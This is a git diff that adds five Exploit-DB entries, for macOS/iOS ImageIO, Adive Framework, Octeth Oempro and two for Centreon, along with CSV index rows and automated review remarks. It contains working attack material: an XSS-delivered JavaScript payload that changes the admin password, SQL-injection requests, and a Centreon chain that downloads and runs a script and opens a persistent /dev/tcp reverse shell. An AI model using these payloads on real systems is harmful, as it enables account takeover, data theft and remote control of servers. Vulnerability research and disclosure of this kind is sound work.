diff --git a/exploits/multiple/dos/47970.txt b/exploits/multiple/dos/47970.txt new file mode 100644 index 000000000..6f0e2692f --- /dev/null +++ b/exploits/multiple/dos/47970.txt 
@@ -0,0 +1,55 @@ +The attached tiff image causes a crash in ImageIO on the latest macOS and iOS. To reproduce the issue, the attached code (tester.m) can be used. I've attached another code snippet to reproduce the issue on iOS as well. With tester.m compiled with ASAN, processing the attached tiff image should crash with an access violation similar to the following: + + % ./tester fuzzed.tif + AddressSanitizer:DEADLYSIGNAL + ================================================================= + ==70578==ERROR: AddressSanitizer: SEGV on unknown address 0x00010decf000 (pc 0x7fff3a588390 bp 0x7ffee8fbb6d0 sp 0x7ffee8fbb0e0 T0) + ==70578==The signal is caused by a WRITE memory access. + #0 0x7fff3a58838f in invocation function for block in TIFFReadPlugin::DecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, std::__1::vector >&) (ImageIO:x86_64h+0xab38f) + #1 0x7fff6e8ca512 in _dispatch_client_callout2 (libdispatch.dylib:x86_64+0x3512) + #2 0x7fff6e8dabcb in _dispatch_apply_serial (libdispatch.dylib:x86_64+0x13bcb) + #3 0x7fff6e8ca4dd in _dispatch_client_callout (libdispatch.dylib:x86_64+0x34dd) + #4 0x7fff6e8cde62 in _dispatch_sync_function_invoke (libdispatch.dylib:x86_64+0x6e62) + #5 0x7fff6e8daaf4 in dispatch_apply_f (libdispatch.dylib:x86_64+0x13af4) + #6 0x7fff3a587028 in TIFFReadPlugin::CallDecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, IIORequest, std::__1::vector >&) (Imag + eIO:x86_64h+0xaa028) + #7 0x7fff3a513f29 in TIFFReadPlugin::copyImageBlockSet(InfoRec*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x36f29) + #8 0x7fff3a4f7a1d in IIO_Reader::CopyImageBlockSetProc(void*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x1aa1d) + #9 0x7fff3a4f6dfe in IIOImageProviderInfo::CopyImageBlockSetWithOptions(void*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x19dfe) + #10 0x7fff37a9eb13 in 
imageProvider_retain_data (CoreGraphics:x86_64h+0x3cb13) + #11 0x7fff37a9ea8f in CGDataProviderRetainData (CoreGraphics:x86_64h+0x3ca8f) + #12 0x7fff37a9eab1 in provider_for_destination_retain_data (CoreGraphics:x86_64h+0x3cab1) + #13 0x7fff37a9ea8f in CGDataProviderRetainData (CoreGraphics:x86_64h+0x3ca8f) + #14 0x7fff37a9e949 in CGAccessSessionCreate (CoreGraphics:x86_64h+0x3c949) + #15 0x7fff37a9cb8c in img_data_lock (CoreGraphics:x86_64h+0x3ab8c) + #16 0x7fff37a9839a in CGSImageDataLock (CoreGraphics:x86_64h+0x3639a) + #17 0x7fff37a97d92 in RIPImageDataInitializeShared (CoreGraphics:x86_64h+0x35d92) + #18 0x7fff37a97951 in RIPImageCacheGetRetained (CoreGraphics:x86_64h+0x35951) + #19 0x7fff37a97426 in ripc_AcquireRIPImageData (CoreGraphics:x86_64h+0x35426) + #20 0x7fff37a966eb in ripc_DrawImage (CoreGraphics:x86_64h+0x346eb) + #21 0x7fff37a95a1f in CGContextDrawImageWithOptions (CoreGraphics:x86_64h+0x33a1f) + #22 0x106c42aab in main (tester:x86_64+0x100001aab) + #23 0x7fff6e91a404 in start (libdyld.dylib:x86_64+0x11404) + + ==70578==Register values: + rax = 0xffffffffffffff01 rbx = 0x0000800080008080 rcx = 0x0000000000000080 rdx = 0x0000000000000008 + rdi = 0x0000000000000000 rsi = 0x0000000000000000 rbp = 0x00007ffee8fbb6d0 rsp = 0x00007ffee8fbb0e0 + r8 = 0x0000632000003002 r9 = 0x00000000000000ff r10 = 0x0000800080008080 r11 = 0xfffffffffffffff0 + r12 = 0x0000000000000001 r13 = 0x000000010decf000 r14 = 0x0000000000000008 r15 = 0x0000000000000000 + AddressSanitizer can not provide additional info. + SUMMARY: AddressSanitizer: SEGV (ImageIO:x86_64h+0xab38f) in invocation function for block in TIFFReadPlugin::DecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, std::__1::vector >&) + ==70578==ABORTING + +The overflow happens out of an mmap region as the memory buffer is allocated using ImageIO_Malloc, which is itself mostly a thin wrapper around mmap. 
+ +The crashing image was found through fuzzing and both the crashing as well as the original image are attached. The relevant byte change removes the BitsPerSample entry (original value is 8) from the TIFF file, in which case a default value of 1 will be used. As the SamplesPerPixel entry is still 3, the image will contain 3 bits per pixel, one for the red, one for the green, and one for the blue component. ImageIO will then allocate width*height*3 bytes of memory (for a RBG bitmap) using ImageIO_Malloc, then call TIFFReadPlugin::DecodeBlocks to write the image data into the buffer. Next, ImageIO uses the tile-oriented TIFF api [1] to read out a tile of the image in its current encoding (3 bits per pixel). The default tile size seems to be 0x100 x 0x100 and so the entire image (which is 143 x 190 pixels large) fits into one tile. Since there are three bits per pixel, the tile has a total of 0x100*0x100*3/8 = 0x6000 bytes, which is what TIFFReadTile returns. Finally, it appears that ImageIO then uses the returned size (0x6000) to decode the image instead of the correct image size (143 x 190). As such, it writes 0x6000*8 bytes (since the output format uses 8 bits per component, not 1) to the output buffer, or about 2.4 times the allocated size. The program then crashes with a memory violation. + +Since the buffer is already allocated using mmap, adding a guard page after it would likely prevent this and similar bugs from being exploitable in the future. + +The attached archive contains the original image and the mutated one causing the crash. It also contains code to reproduce the issue on macOS and iOS. Finally, it contains a python script to change the byte in question in the original file to remove the BitsPerSample entry and thus trigger the issue. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47970.zip \ No newline at end of file 
diff --git a/exploits/php/webapps/47966.txt b/exploits/php/webapps/47966.txt new file mode 100644 index 000000000..136d0cd0b --- /dev/null +++ b/exploits/php/webapps/47966.txt 
@@ -0,0 +1,93 @@ +# Exploit Title: Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password) +# Exploit Author: Sarthak Saini +# Date: 2020-01-18 +# Vendor Link : https://www.adive.es/ +# Software Link: https://github.com/ferdinandmartin/adive-php7 +# Version: 2.0.8 +# CVE:CVE-2020-7991 +# Category: Webapps +# Tested on: windows64bit / mozila firefox +# +# +|--!> + +|---------------------------------------------------------------------------------- + +1) Persistent Cross-site Scripting at user add page + +Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting + +Payload:- + +POST /admin/user/add HTTP/1.1 +Host: 192.168.2.5 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 62 +Origin: http://192.168.2.5 +DNT: 1 +Connection: close +Referer: http://192.168.2.5/admin/user/add +Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 +Upgrade-Insecure-Requests: 1 + +userName=test&userUsername=&pass=test&cpass=test&permission=3 + + +|---------------------------------------------------------------------------------- + + +2) account takeover - cross side request forgery (Change Admin Password) + + +Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger. 
+ +-> Save the payload as exp.js + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- +function execute() +{ + var nuri ="http://192.168.2.5/admin/config"; + xhttp = new XMLHttpRequest(); + xhttp.open("POST", nuri, true); + xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + xhttp.withCredentials = "true"; + var body = ""; + body += "\r\n\r\n"; + body += + "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web"; + xhttp.send(body); + return true; +} + +execute(); +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- + +-> Start a server and host the exp.js. Send the exp.js file in the xss payload + +Payload:- + +POST /admin/user/add HTTP/1.1 +Host: 192.168.2.5 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 143 +Origin: http://192.168.2.5 +DNT: 1 +Connection: close +Referer: http://192.168.2.5/admin/user/add +Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 +Upgrade-Insecure-Requests: 1 + +userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3 + + +-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123 + +|-----------------------------------------EOF----------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/47967.txt b/exploits/php/webapps/47967.txt new file mode 100644 index 000000000..5e8006187 --- /dev/null +++ b/exploits/php/webapps/47967.txt 
@@ -0,0 +1,24 @@ +# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection +# Date: 2020-01-27 +# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br) +# Vendor Homepage: www2.octeth.com +# Version: Octeth Oempro v.4.7 and v.4.8 +# Tested on: Oempro v.4.7 +# CVE : CVE-2019-19740 + + +An authenticated user can easily exploit this vulnerability. Octeth Oempro +4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get +is vulnerable. + +# Error condition +POST /api.php HTTP/1.1 +Host: 127.0.0.1 + +command=Campaign.Get&CampaignID=2019'&responseformat=JSON + +# SQL Injection exploitation +POST /api.php HTTP/1.1 +Host: 127.0.0.1 + +command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON \ No newline at end of file diff --git a/exploits/php/webapps/47968.txt b/exploits/php/webapps/47968.txt new file mode 100644 index 000000000..494efaa1c --- /dev/null +++ b/exploits/php/webapps/47968.txt 
@@ -0,0 +1,42 @@ +# Exploit Title: Centreon 19.10.5 - Database Credentials Disclosure +# Date: 2020-01-27 +# Exploit Author: Fabien AUNAY, Omri Baso +# Vendor Homepage: https://www.centreon.com/ +# Software Link: https://github.com/centreon/centreon +# Version: 19.10.5 +# Tested on: CentOS 7 +# CVE : - + +########################################################################################################### +Centreon 19.10.5 Database Credentials Disclosure + +Trusted by SMBs and Fortune 500 companies worldwide. +An industry reference in IT Infrastructure monitoring for the enterprise. +Counts 200,000+ ITOM users worldwide and an international community of software collaborators. +Presence in Toronto and Luxembourg. +Deployed in diverse sectors: +- IT & telecommunication +- Transportation +- Government +- Heath care +- Retail +- Utilities +- Finance & Insurance +- Aerospace & Defense +- Manufacturing +- etc. + +########################################################################################################### + +POC: + +- Configuration / Pollers / Broker configuration +-- Central-broker | Central-broker-master +--- Output + +It is possible to discover the unencrypted password with the inspector. + + +DB user centreon +DB password ******** + \ No newline at end of file diff --git a/exploits/php/webapps/47969.txt b/exploits/php/webapps/47969.txt new file mode 100644 index 000000000..45370e323 --- /dev/null +++ b/exploits/php/webapps/47969.txt 
@@ -0,0 +1,143 @@ +# Exploit Title: Centreon 19.10.5 - Remote Command Execution +# Date: 2020-01-27 +# Exploit Author: Fabien AUNAY, Omri BASO +# Vendor Homepage: https://www.centreon.com/ +# Software Link: https://github.com/centreon/centreon +# Version: 19.10.5 +# Tested on: CentOS 7 +# CVE : - + +########################################################################################################### +Centreon 19.10.5 Remote Command Execution Resources + +Trusted by SMBs and Fortune 500 companies worldwide. +An industry reference in IT Infrastructure monitoring for the enterprise. +Counts 200,000+ ITOM users worldwide and an international community of software collaborators. +Presence in Toronto and Luxembourg. +Deployed in diverse sectors: +- IT & telecommunication +- Transportation +- Government +- Heath care +- Retail +- Utilities +- Finance & Insurance +- Aerospace & Defense +- Manufacturing +- etc. + +It is possible to call binaries not only in default $USER$ path by adding Poller's Resources. +By adding two entries it is possible to trigger a download exec reverse shell. +Note, your reverse shell is persistent because Centreon execute your payloads all 10 minutes by default. + +Steps: +Objective 1 : Add Download Resource +Objective 2 : Add Exec Resource +Objective 3 : Create your both commands check +Objective 4 : Create your services and link them with a host + +Restart the Central. + +########################################################################################################### + +# Objective 1 : Add Download Resource +- Configuration/Pollers/Resources + +- Problem: +Illegal Object Name Characters : ~!$%^&*"|'<>?,()= +Illegal Macro Output Characters : `~$^&"|'<> +Maximum client side input size limit: 35 + +- Information: +Read Centreon documentation: +To install Centreon software from the repository, you should first install the centreon-release package, +which will provide the repository file. Some may not have the wget package installed. 
+If not perform the following : yum install wget + +Solution 1: Remove restriction in Configuration/Pollers/Engine configuration +Solution 2: Modify input size inspector in client side size="250" +Solution 3: Mixed, use a custom payload -> wget -P /tmp/ 127.0.0.1:8080/x.sh + + +# Objective 2 : Add Exec Resource +- Configuration/Pollers/Resources + +- Problem: +Illegal Object Name Characters : ~!$%^&*"|'<>?,()= +Illegal Macro Output Characters : `~$^&"|'<> +Maximum client side input size limit: 35 + +Solution: Use a custom payload -> bash /tmp/x.sh + + +# Objective 3 : Create your both commands check with your resources $xxx$ without arguments +# Objective 4 : Create your services and link them with a host + + +POC: +Payload x.sh : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121 + +python -m SimpleHTTPServer 8080 +Serving HTTP on 0.0.0.0 port 8080 ... +127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 - + + +nc -lvnp 1234 +Ncat: Version 7.50 +Ncat: Listening on :::1234 +Ncat: Listening on 0.0.0.0:1234 +Ncat: Connection from 127.0.0.1. +Ncat: Connection from 127.0.0.1:43128. 
+id +uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon) +sudo -l +Matching Defaults entries for centreon-engine on centreon-lab: + !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, + env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", + env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", + env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", + env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", + env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", + secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty + +User centreon-engine may run the following commands on centreon-lab: + (root) NOPASSWD: /sbin/service centreontrapd start + (root) NOPASSWD: /sbin/service centreontrapd stop + (root) NOPASSWD: /sbin/service centreontrapd restart + (root) NOPASSWD: /sbin/service centreontrapd reload + (root) NOPASSWD: /usr/sbin/service centreontrapd start + (root) NOPASSWD: /usr/sbin/service centreontrapd stop + (root) NOPASSWD: /usr/sbin/service centreontrapd restart + (root) NOPASSWD: /usr/sbin/service centreontrapd reload + (root) NOPASSWD: /sbin/service centengine start + (root) NOPASSWD: /sbin/service centengine stop + (root) NOPASSWD: /sbin/service centengine restart + (root) NOPASSWD: /sbin/service centengine reload + (root) NOPASSWD: /usr/sbin/service centengine start + (root) NOPASSWD: /usr/sbin/service centengine stop + (root) NOPASSWD: /usr/sbin/service centengine restart + (root) NOPASSWD: /usr/sbin/service centengine reload + (root) NOPASSWD: /bin/systemctl start centengine + (root) NOPASSWD: /bin/systemctl stop centengine + (root) NOPASSWD: /bin/systemctl restart centengine + (root) NOPASSWD: /bin/systemctl reload centengine + (root) NOPASSWD: /usr/bin/systemctl start centengine + (root) NOPASSWD: /usr/bin/systemctl stop centengine + (root) NOPASSWD: /usr/bin/systemctl restart 
centengine + (root) NOPASSWD: /usr/bin/systemctl reload centengine + (root) NOPASSWD: /sbin/service cbd start + (root) NOPASSWD: /sbin/service cbd stop + (root) NOPASSWD: /sbin/service cbd restart + (root) NOPASSWD: /sbin/service cbd reload + (root) NOPASSWD: /usr/sbin/service cbd start + (root) NOPASSWD: /usr/sbin/service cbd stop + (root) NOPASSWD: /usr/sbin/service cbd restart + (root) NOPASSWD: /usr/sbin/service cbd reload + (root) NOPASSWD: /bin/systemctl start cbd + (root) NOPASSWD: /bin/systemctl stop cbd + (root) NOPASSWD: /bin/systemctl restart cbd + (root) NOPASSWD: /bin/systemctl reload cbd + (root) NOPASSWD: /usr/bin/systemctl start cbd + (root) NOPASSWD: /usr/bin/systemctl stop cbd + (root) NOPASSWD: /usr/bin/systemctl restart cbd + (root) NOPASSWD: /usr/bin/systemctl reload cbd \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 86655d434..e43feab29 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6663,6 +6663,7 @@ id,file,description,date,author,type,platform,port 47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple, 47955,exploits/windows/dos/47955.py,"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)",2020-01-23,boku,dos,windows, 47964,exploits/windows/dos/47964.cpp,"Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)",2020-01-23,ollypwn,dos,windows, +47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -17949,7 +17950,7 @@ id,file,description,date,author,type,platform,port 47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java, 47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux, 47936,exploits/hardware/remote/47936.js,"Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution",2020-01-15,Lyrebirds,remote,hardware, -47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux, +47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux,21 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 
@@ -42257,10 +42258,14 @@ id,file,description,date,author,type,platform,port 47941,exploits/php/webapps/47941.py,"Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass",2020-01-17,"B. Canavate",webapps,php, 47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php, 47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php, -47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java, +47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java,80 47954,exploits/php/webapps/47954.py,"qdPM 9.1 - Remote Code Execution",2020-01-23,"Rishal Dwivedi",webapps,php, 47951,exploits/xml/webapps/47951.py,"Citrix XenMobile Server 10.8 - XML External Entity Injection",2020-01-22,"Jonas Lejon",webapps,xml, 47958,exploits/hardware/webapps/47958.txt,"TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot",2020-01-24,PCEumel,webapps,hardware, -47959,exploits/php/webapps/47959.txt,"Webtareas 2.0 - 'id' SQL Injection",2020-01-24,Greg.Priest,webapps,php, -47960,exploits/asp/webapps/47960.txt,"OLK Web Store 2020 - Cross-Site Request Forgery",2020-01-24,"Joel Aviad Ossi",webapps,asp, +47959,exploits/php/webapps/47959.txt,"Webtareas 2.0 - 'id' SQL Injection",2020-01-24,Greg.Priest,webapps,php,80 +47960,exploits/asp/webapps/47960.txt,"OLK Web Store 2020 - Cross-Site Request Forgery",2020-01-24,"Joel Aviad Ossi",webapps,asp,80 47961,exploits/hardware/webapps/47961.txt,"Genexis Platinum-4410 2.1 - Authentication Bypass",2020-01-24,"Husinul Sanub",webapps,hardware, +47966,exploits/php/webapps/47966.txt,"Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)",2020-01-28,"Sarthak Saini",webapps,php, 
+47967,exploits/php/webapps/47967.txt,"Octeth Oempro 4.8 - 'CampaignID' SQL Injection",2020-01-28,"Bruno de Barros Bulle",webapps,php,80 +47968,exploits/php/webapps/47968.txt,"Centreon 19.10.5 - Database Credentials Disclosure",2020-01-28,"Fabien AUNAY",webapps,php, +47969,exploits/php/webapps/47969.txt,"Centreon 19.10.5 - Remote Command Execution",2020-01-28,"Fabien AUNAY",webapps,php,
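Review bot: in exploits/multiple/dos/47970.txt the analysis paragraph cites "the tile-oriented TIFF api [1]" but the file never defines reference [1]; add the link or drop the marker. The ASAN trace has also lost text: frame #6 is split mid-token ("(Imag" on one line, "eIO:x86_64h+0xaa028)" on the next) and the DecodeBlocks signature reads "std::__1::vector >&" with the template arguments gone, so the trace should be pasted again verbatim. "RBG bitmap" should read "RGB bitmap", and the file lacks the "# Exploit Title / # Date / # Exploit Author" header that the other files added in this commit carry.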
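Review bot: in exploits/php/webapps/47966.txt, section 1 names 'userUsername=' as the vulnerable parameter, but its request body sends that parameter empty, and the section 2 request carries the script tag in userName with userUsername=test; state which field is actually stored and rendered unencoded on /admin/user, since that is the field a fix has to output-encode. The title calls this Cross-Site Request Forgery, yet the steps describe a same-origin request issued by stored script, which an anti-CSRF token alone would not stop; the description should say so. Minor points: the header contains a stray "|--!>" line, "cross side request forgery" should be "cross-site", and exp.js sets withCredentials to the string "true" rather than the boolean.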
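Review bot: in exploits/php/webapps/47967.txt the title names Oempro 4.8 and the Version line lists v.4.7 and v.4.8, but "Tested on" lists only v.4.7; say whether 4.8 was verified or only inferred. The "# Error condition" request also gives no expected response, so a reader cannot tell what distinguishes the error case from a normal Campaign.Get reply; add the observed response or status. The header date (2020-01-27) differs from the 2020-01-28 in the files_exploits.csv row, which deserves a one-line explanation if the CSV carries the publication date.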
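Review bot: in exploits/php/webapps/47968.txt the POC gives the menu path (Configuration / Pollers / Broker configuration, Central-broker-master, Output) but not which account or role is needed to open it, which decides how serious the disclosure is; add a line stating the required privileges. Much of the file is vendor marketing copy ("Trusted by SMBs and Fortune 500 companies worldwide." through the sector list, including the typo "Heath care") that adds nothing to the finding and could be cut to a one-line product description.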
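Review bot: in exploits/php/webapps/47969.txt every step runs through Configuration/Pollers/Resources and ends with "Restart the Central", so the issue needs an authenticated account with configuration rights, yet neither the title nor the header says so; the neighbouring 47948 row in files_exploits.csv uses "Authenticated Remote Code Execution" and this title should follow it. The vendor marketing block from 47968.txt is repeated here, the co-author is spelled "Omri BASO" here and "Omri Baso" there, and the full sudo -l listing could be reduced to the lines that support the point being made.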
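Review bot: in the last files_exploits.csv hunk (@@ -42257,10 +42258,14 @@) the rows for 47968 and 47969 list only "Fabien AUNAY" as author although both file headers also credit Omri Baso; add the second author. The port column is filled unevenly as well: this hunk backfills 80 on 47949, 47959 and 47960 and sets it on 47967, but leaves 47966, 47968 and 47969 empty even though all three write-ups describe PHP web applications reached over HTTP.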